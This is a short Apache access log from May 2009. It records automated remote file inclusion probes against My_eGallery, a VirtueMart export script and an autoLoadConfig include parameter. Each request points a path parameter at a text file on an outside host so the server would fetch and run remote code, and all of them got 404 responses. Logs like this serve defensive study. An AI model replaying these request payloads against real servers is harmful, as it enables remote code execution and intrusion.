110.45.146.146 - - [08/May/2009:01:01:54 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:02:24 -0400] "GET /logs/access_log.Q108121000%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:02:27 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:01:02:32 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:01:02:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:01:02:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
110.45.146.88 - - [08/May/2009:01:02:38 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:01:02:40 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:02:40 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:01:02:48 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:01:02:49 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
110.45.146.146 - - [08/May/2009:01:02:49 -0400] "GET /logs/access_log.Q109032700%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:01:02:49 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
